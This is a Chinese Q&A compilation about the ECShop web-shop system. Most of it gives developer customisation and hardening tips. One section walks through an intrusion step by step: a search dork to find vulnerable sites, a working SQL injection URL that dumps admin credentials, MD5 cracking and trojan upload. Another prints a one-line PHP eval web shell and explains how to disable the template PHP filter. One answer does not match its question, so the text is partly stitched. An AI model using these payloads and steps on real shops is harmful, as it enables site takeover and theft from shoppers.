ecshop路由过滤

Ⅰ ecshop 怎么着不到 get_filter()这个方法

取得上次的过滤条件
admin\includes\lib_main.php文件的第719行

Ⅱ 怎样调用ecshop商品详情页的URL

找个这个文件在根目录下gods.php
找到
$smarty->assign('promotion_info',get_promotion_info());
在下面加上以下代码：
$globals['smarty']->assign('ecs_url',$gobals['ecs']->get_domain().$_server['request_uri']);
然后到相应的模板goods.dwt
加上标签
{$ecs_url}
就可以正常显示了。
如果需要在其他页面也加上调用当前url效果，那么也加上此代码，加此标签就可以了。
希望能帮助你，如果出错截图错误，帮助你或者私信我网络帐号

Ⅲ ecshop留言板添加一项必填项-联系人,并且留言后,联系人会在后台显示出来

ecshop留言板添加一项必填项-联系人
一、首先要为你的数据库的ecs_comment增加一个字段以存储联系人姓名：
可以直接在后台-->数据库管理--->SQL查询里里直接执行以下sql语句:
alter table ecs_comment add contact varchar(60) not null default '';
此处注意，这条sql语句中的表前缀ecs_要和你网站的前缀一致，不然会报错，如果你不知道你ecshop网站的数据表前缀
，请看这里

二、修改评论提交表单增加联系人表单项
打开你网站的themes文件夹,找到你的模板风格，进入里面，找到message_board.dwt,在
<tr>
<td align="right">{$lang.email}</td>
<td><input name="user_email" type="text" class="inputBg" size="20" value="{$smarty.session.email|escape}" /></td>
</tr>
这段代码的下方增加

<tr>
<td align="right">联系人</td>
<td><input name="contact" type="text" class="inputBg" size="20" value="" /></td>
</tr>
然后修改提交评论的js函数为
/**
* 提交留言信息
*/
function submitMsgBoard(frm)
{
var msg = new Object;

msg.user_email = frm.elements['user_email'].value;
msg.contact = frm.elements['contact'].value;
msg.msg_title = frm.elements['msg_title'].value;
msg.msg_content = frm.elements['msg_content'].value;
msg.captcha = frm.elements['captcha'] ? frm.elements['captcha'].value : '';

var msg_err = '';

if (msg.user_email.length > 0)
{
if (!(Utils.isEmail(msg.user_email)))
{
msg_err += msg_error_email + '\n';
}
}
else
{
msg_err += msg_empty_email + '\n';
}
if (msg.contact.length == 0)
{
msg_err += '联系人不能为空\n';
}
if (msg.msg_title.length == 0)
{
msg_err += msg_title_empty + '\n';
}
if (frm.elements['captcha'] && msg.captcha.length==0)
{
msg_err += msg_captcha_empty + '\n'
}
if (msg.msg_content.length == 0)
{
msg_err += msg_content_empty + '\n'
}
if (msg.msg_title.length > 200)
{
msg_err += msg_title_limit + '\n';
}

if (msg_err.length > 0)
{
alert(msg_err);
return false;
}
else
{
return true;
}
}

三、修改处理评论提交的message.php
if ($action == 'act_add_message')
{
include_once(ROOT_PATH . 'includes/lib_clips.php');

/* 验证码防止灌水刷屏 */
if ((intval($_CFG['captcha']) & CAPTCHA_MESSAGE) && gd_version() > 0)
{
include_once('includes/cls_captcha.php');
$validator = new captcha();
if (!$validator->check_word($_POST['captcha']))
{
show_message($_LANG['invalid_captcha']);
}
}
else
{
/* 没有验证码时，用时间来限制机器人发帖或恶意发评论 */
if (!isset($_SESSION['send_time']))
{
$_SESSION['send_time'] = 0;
}

$cur_time = gmtime();
if (($cur_time - $_SESSION['send_time']) < 30) // 小于30秒禁止发评论
{
show_message($_LANG['cmt_spam_warning']);
}
}
$user_name = '';
if (empty($_POST['anonymous']) && !empty($_SESSION['user_name']))
{
$user_name = $_SESSION['user_name'];
}
elseif (!empty($_POST['anonymous']) && !isset($_POST['user_name']))
{
$user_name = $_LANG['anonymous'];
}
elseif (empty($_POST['user_name']))
{
$user_name = $_LANG['anonymous'];
}
else
{
$user_name = htmlspecialchars(trim($_POST['user_name']));
}

$user_id = !empty($_SESSION['user_id']) ? $_SESSION['user_id'] : 0;
$message = array(
'user_id' => $user_id,
'user_name' => $user_name,
'user_email' => isset($_POST['user_email']) ? htmlspecialchars(trim($_POST['user_email'])) : '',
'contact' => isset($_POST['user_email']) ? htmlspecialchars(trim($_POST['contact'])) : '',

'msg_type' => isset($_POST['msg_type']) ? intval($_POST['msg_type']) : 0,
'msg_title' => isset($_POST['msg_title']) ? trim($_POST['msg_title']) : '',
'msg_content' => isset($_POST['msg_content']) ? trim($_POST['msg_content']) : '',
'order_id' => 0,
'msg_area' => 1,
'upload' => array()
);

if (add_message($message))
{
if (intval($_CFG['captcha']) & CAPTCHA_MESSAGE)
{
unset($_SESSION[$validator->session_word]);
}
else
{
$_SESSION['send_time'] = $cur_time;
}
$msg_info = $_CFG['message_check'] ? $_LANG['message_submit_wait'] : $_LANG['message_submit_done'];
show_message($msg_info, $_LANG['message_list_lnk'], 'message.php');
}
else
{
$err->show($_LANG['message_list_lnk'], 'message.php');
}
}

四、增加后台显示联系人

a、打开admin/user_msg.php,把
/**
*
*
* @access public
* @param
*
* @return void
*/
function msg_list()
{
/* 过滤条件 */
$filter['keywords'] = empty($_REQUEST['keywords']) ? '' : trim($_REQUEST['keywords']);
if (isset($_REQUEST['is_ajax']) && $_REQUEST['is_ajax'] == 1)
{
$filter['keywords'] = json_str_iconv($filter['keywords']);
}
$filter['msg_type'] = isset($_REQUEST['msg_type']) ? intval($_REQUEST['msg_type']) : -1;
$filter['sort_by'] = empty($_REQUEST['sort_by']) ? 'f.msg_id' : trim($_REQUEST['sort_by']);
$filter['sort_order'] = empty($_REQUEST['sort_order']) ? 'DESC' : trim($_REQUEST['sort_order']);

$where = '';
if ($filter['keywords'])
{
$where .= " AND f.msg_title LIKE '%" . mysql_like_quote($filter['keywords']) . "%' ";
}
if ($filter['msg_type'] != -1)
{
$where .= " AND f.msg_type = '$filter[msg_type]' ";
}

$sql = "SELECT count(*) FROM " .$GLOBALS['ecs']->table('feedback'). " AS f" .
" WHERE parent_id = '0' " . $where;
$filter['record_count'] = $GLOBALS['db']->getOne($sql);

/* 分页大小 */
$filter = page_and_size($filter);

$sql = "SELECT f.msg_id, f.user_name, f.contact, f.msg_title, f.msg_type, f.order_id, f.msg_status, f.msg_time, f.msg_area, COUNT(r.msg_id) AS reply " .
"FROM " . $GLOBALS['ecs']->table('feedback') . " AS f ".
"LEFT JOIN " . $GLOBALS['ecs']->table('feedback') . " AS r ON r.parent_id=f.msg_id ".
"WHERE f.parent_id = 0 $where " .
"GROUP BY f.msg_id ".
"ORDER by $filter[sort_by] $filter[sort_order] ".
"LIMIT " . $filter['start'] . ', ' . $filter['page_size'];

$msg_list = $GLOBALS['db']->getAll($sql);
foreach ($msg_list AS $key => $value)
{ if($value['order_id'] > 0)
{
$msg_list[$key]['order_sn'] = $GLOBALS['db']->getOne("SELECT order_sn FROM " . $GLOBALS['ecs']->table('order_info') ." WHERE order_id= " .$value['order_id']);
}
$msg_list[$key]['msg_time'] = local_date($GLOBALS['_CFG']['time_format'], $value['msg_time']);
$msg_list[$key]['msg_type'] = $GLOBALS['_LANG']['type'][$value['msg_type']];
}
$filter['keywords'] = stripslashes($filter['keywords']);
$arr = array('msg_list' => $msg_list, 'filter' => $filter, 'page_count' => $filter['page_count'], 'record_count' => $filter['record_count']);

return $arr;
}

b、打开admin/templates/msg_list.htm 把
<td align="center">{$msg.user_name}</td>
改成
<td align="center">{$msg.user_name}<br />{$msg.contact}</td>

Ⅳ 用的是ecshop网店系统，最近网站首页老是被黑，情况就是index.php给更改内容，请问怎么解决，急急急！

最近9月份出来的ecshop漏洞,对于2.72 .2.73 3.0 3.6 4.0版本的sql执行getshell漏洞导致的用ecshop程序的网站被入侵 而且网站首页总是被篡改经常是标题和描述被修改从网络搜索打开网站跳转到一些博cai网站,应该对转义函数进行过滤防止post提交生成php脚本木马文件，而且这个被篡改的问题是反复性质的，清理删除代码后没过多久就又被篡改了。

必须要对程序漏洞的根源问题进行修复网站漏洞,清理已经被上传的隐蔽性的木马后门。如果对程序代码不熟悉的话建议找专业做网站安全公司来处理此问题,国内推荐Sinesafe,绿盟,启蒙星辰等等。

Ⅳ ecshop安全问题，怎么让ecshop不被黑客入侵

1:常常换FTP帐户密码。把FTP端口修改掉
2:服务器安全加强。避免简单密码.以及数据库端口修改
3:服务器增加VPN登陆
4:修改后台路径
5:严格过滤表单录入,防止注入
6:设置好程序文件目录权限。防止恶意文件运行

Ⅵ php语言，tp框架是单入口文件，那么ecshop是不是属于多入口文件的框架

tp是一个单入口的php框架，所有的页面都是在访问index.php，然后根据不同的参数请求，走不同的路由，这样好处理，安全，适应协作开发。

ecshop就不算什么框架了，只是一个面向过程的一套程序，首页一个页面，分类一个页面，内容页一个页，等等，可以说有多少个页面就有多少个文件。ecshop是十年前的产品，产品的设计理念比较落后。

Ⅶ 怎么去掉ecshop模板文件过滤php标签

最好不要在模板里面写php。会导致sql注入，引起后台账号泄露。
ECshop的模板是支持php代码的，这个给一些不法分子创造了挂马的机会，这些不法分子挂马步骤很可能是：
1、通过ecshop的漏洞搞SQL注入，暴出管理员密码md5值，然后通过**md5得到管理密码。（注:防止暴出管理密码md5值的方法是关闭display_errors，并且修改cls_mysql.php里的ErrorMsg函数，注释掉所有错误输出代码或把错误写入文件）
2、进入管理后台，通过模板管理－>库项目管理，编辑lbi文件，添加php代码，例如<?php @eval($_POST['lx']);?>
3、到这里，就完全控制这个站了，想挂什么马就挂什么马。
可见，ECshop的模板支持php代码这点是非常危险的，因此我们应该过滤模板里的所有php代码。

如果实在要去掉ecshop模板文件过滤php标签
修改 includes/cls_template.php

可以遵循以下步骤：
去掉第288-299行以下代码：
if(preg_match_all('~(<\?(?:\w+|=)?|\?>|language\s*=\s*[\"\']?php[\"\']?)~is', $source, $sp_match))
{
$sp_match[1] = array_unique($sp_match[1]);
for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)
{
$source = str_replace($sp_match[1][$curr_sp],'%%%SMARTYSP'.$curr_sp.'%%%',$source);
}
for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)
{
$source= str_replace('%%%SMARTYSP'.$curr_sp.'%%%', '<?php echo \''.str_replace("'", "\'", $sp_match[1][$curr_sp]).'\'; ?>'."\n", $source);
}
}
这样，模板里的php代码就被保留了。

Ⅷ ecshop 为什么用request的用法

一、网络设置的问题

这种原因比较多出现在需要手动指定IP、网关、DNS服务器联网方式下，及使用代理服务器上网的。仔细检查计算机的网络设置。

二、网络协议和网卡驱动的问题

IE无法浏览，有可能是网络协议（特别是TCP/IP协议）或网卡驱动损坏导致，可尝试重新网卡驱动和网络协议。

三、DNS服务器的问题

当IE 无法浏览网页时，可先尝试用IP地址来访问，如果可以访问，那么应该是DNS的问题，造成DNS的问题可能是连网时获取DNS出错或DNS服务器本身问题，这时你可以手动指定DNS服务（地址可以是你当地ISP提供的DNS服务器地址，也可以用其它地方可正常使用DNS服务器地址）。在网络的属性里进行（控制面板—网络和拔号连接—本地连接—右键属性—TCP/IP协议—属性—使用下面的DNS服务器地址）。不同的ISP有不同的DNS地址。有时候则是路由器或网卡的问题，无法与ISP的DNS服务连接，这种情况的话，可把路由器关一会再开，或者重新设置路由器。

还有一种可能，是本地 DNS缓存出现了问题。为了提高网站访问速度，系统会自动将已经访问过并获取IP地址的网站存入本地的DNS缓存里，一旦再对这个网站进行访问，则不再通过DNS服务器而直接从本地DNS缓存取出该网站的IP地址进行访问。所以，如果本地DNS缓存出现了问题，会导致网站无法访问。可以在“运行”中执行 ipconfig /flushdns来重建本地DNS缓存。

四、网络防火墙的问题

如果网络防火墙设置不当，如安全等级过高、不小心把IE放进了阻止访问列表、错误的防火墙策略等，可尝试检查策略、降低防火墙安全等级或直接关掉试试是否恢复正常。

五、HOSTS文件的问题

HOSTS文件被修改，也会导致浏览的不正常，解决方法当然是清空HOSTS文件里的内容。

六、系统文件的问题

当与IE有关的系统文件被更换或损坏时，会影响到IE正常的使用，这时可使用SFC命令修复一下，WIN98系统可在“运行”中执行SFC，然后执行扫描；WIN2000/XP/2003则在“运行”中执行sfc /scannow尝试修复。

七、IE浏览器本身的问题

当IE浏览器本身出现故障时，自然会影响到浏览了；或者IE被恶意修改破坏也会导致无法浏览网页。这时可以尝试用“IE修复专家”来修复（建议到安全模式下修复），或者重装IE。

Ⅸ 木马是怎样攻入Ecshop商城的

Ecshop是一套网络商城建站系统，主要服务于想快捷搭建商城系统的用户，该系统是个人建立商城的主流软件。
在网络上，主要有两种类型的网络购物，一类是像淘宝这样的C2C站点，另一类是像卓越这样的B2C站点。B2C站点除了卓越、当当等大型站点外，还有很多规模较小的B2C站点，由于这些中小型B2C站点数目较大，因此每天的成交量也非常可观。
这些的中小型B2C站点通常没有专业的建站团队，站点都是站长通过现成的商城程序搭建起来的，其中Ecshop网络商城系统用得最多，因此一旦这套系统出现安全问题，将会波及网络上所有采用这套系统建立的B2C站点。
但不幸的事情还是发生了，Ecshop出现了严重的安全漏洞，黑客可以运用 该漏洞入侵站点，窜改商品价格，更令人担忧的是该漏洞可以被用来挂马，所有访问商城的用户都会中毒，他们的各种账号和密码可能被盗。此外，黑客可以修改站点的支付接口，用户购买商品时货款会直接打到黑客的账户中。
本文主角：Ecshop商城 V2.5.0
问题所在：含有SQL漏洞
主要危害：用于挂马、入侵服务器等
Ecshop存在SQL注入漏洞
运用 Ecshop漏洞须要用到SQL注入。由于程序员的疏忽，没有对User.php文件中的SQL变量实行过滤，从而导致SQL注入的发生。黑客可以构造特殊的代码，直接读取存放在站点数据库中的管理员账号和密码。
漏洞的运用 非常基本，只需在站点地址后输入“user.php?act=order_query&order_sn=' union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*”这样一句代码就可以读出站点数据库中的管理员账号和密码。
挂马流程揭秘
第一步：寻找入侵目标
在网络或谷歌中以“Powered by Ecshop v2.5.0”为关键字实行搜索(图1)，可以找到很多符合条件的站点，随便挑选一个站点作为测试目标。须要留心的是，站点越小安全防护也越弱，成功率相比较较高。

第二步：获得管理员账号和密码
打开测试站点，在其网址后输入：user.php?act=order_query&order_sn=' union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*。
例如该站点网址为http://www.***.com/，则完整的漏洞运用 地址为：http://www.***.com/ user.php?act=order_query&order_sn=' union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*。
输入完毕后回车，如果看到类似图2的界面，则说明漏洞被运用 成功了。在返回的信息中，可以发觉很主要的内容，包括站点管理员的账号、密码及E-mail地址。从图2可以找到，管理员账号为admin，密码为。密码是经过MD5加密的，所以看到的是一串32位长的字符，须要对这串字符实行破解才能看到真实的密码。

第三步：破解MD5密码
虽然密码经过MD5加密，但是通过破解是可以得到密码原文的。将这段MD5值复制下来，打开MD5在线破解站点 http://www.cmd5.com/。
把这串MD5值复制到站点页面正中间的文本框中，点击“MD5加密或解密”按钮，密码原文就被破解出来了——admin1234(图3)。当然，破解MD5值靠的是运气，如果管理员将密码配置得很复杂，例如“数字+字母+特殊符号”的组合，那么就很难破解出密码原文。

如果MD5在线破解站点无法破解出密码原文，那么也可以采用MD5暴力破解软件来实行破解，当然耗费的时间会很长，在这里就不多作介绍了。
第四步：上传木马
既然管理员账号和密码都已拿到手，接下来我们就可以登录站点的后台了。在站点网址后输入admin并回车，将会出现站点后台登录页面，输入管理员账号admin、密码admin1234即可登录。
来到后台，我们可以看到Ecshop的站点后台功能是非常多的，当然这也给了我们上传木马的机会。点击“系统配置 ”中的“Flash播放器管理”链接(图4)。打开后再点击“添加自定义”按钮。


这时我们会来到一个上传图片的页面，在这里不仅仅可以上传图片，还能轻轻松松地上传木马!这里我们选择一款功能强大的PHP木马，点击“确定”按钮即可将木马上传(图5)。

上传成功后，进入“轮播图片地址”，在这里我们可以看到上传的木马的的路径(图6)。

将地址复制到浏览器地址栏中并打开，可以在里面任意浏览、修改甚至删除站点中的文件(图7)，最后就是在站点首页中插入挂马代码，当用户浏览商城首页的时候，就会激活病毒，病毒会偷偷地入侵用户的计算机。


防备方案
要修补该漏洞，须要对User.php文件中的SQL变量实行严格的过滤，不允许恶意调用变量查询数据库。普通读者在上网时，最好运用能拦截网页木马的安全辅助工具，防止网页木马的骚扰。

Ⅹ ECShop安全吗

互联网上的任务东西都存在在一定的风险，没有一个绝对的安全；如果你决定使用ecshop的话，我只能给你一些建议。
一，ecshop安装，其实很简单，只要一直下一步下一步点击即可，这样总是没有错的，因为官方不可能给我们一个有问题的程序，尽量从简即可。
请注意一下两点
A：在安装ecshop的时候，不要将所有文件都设置成777。参考ecshop指导，将必须要的文件设置一下即可。
B：安装ecshop的时候，建议不要用admin用户名，并设置复杂的密码
C：mysql数据库，默认前缀是ecs,建议将他修改成其他的.
二，ecshop网店的安全问题还要设置好网站的目录权限
一
般来说，黑客攻击都会选择API/CERT/ IMAGES/
JS/LANGUAGES/widget这些文件，所以要设置每一个页面的权限，这方面可以参考官方的一些文档。有php基础的朋友，可以对
user.php今天修改，对SQL变量进行过滤，可以防止被挂马。
三，ecshop安全方面的细节
对于ecshop的会员管理方面，一定要及时的清理垃圾信息，这样的垃圾会员很容易会登入到你的后台，这样的话后果不堪设想了。
四，ecshop模板与插件
其实这点很是重要，一个商城，模板就是一个门面，外面有太多太多的免费模板与插件，不过可能会有后门的存在，这是有一定风险的。
五，修改登入地址
272版本之后修改后台登录地址非常方便，步骤如下
1，修改admin文件夹名称为“68ecshop”
2，打开data/config.php文件，搜里面所有“admin”字样改成“68ecshop”字样就行。
3，这样访问域名/68ecshop 即可连接到后台

六，定期更新ecshop补丁。因为ecshop官方是会随时出安全补丁的，只要定期更新补丁就可以避免由于漏洞的存在遭到入侵了。

设置了以上这些后，你的网站安全系数会得到一个很好的提升。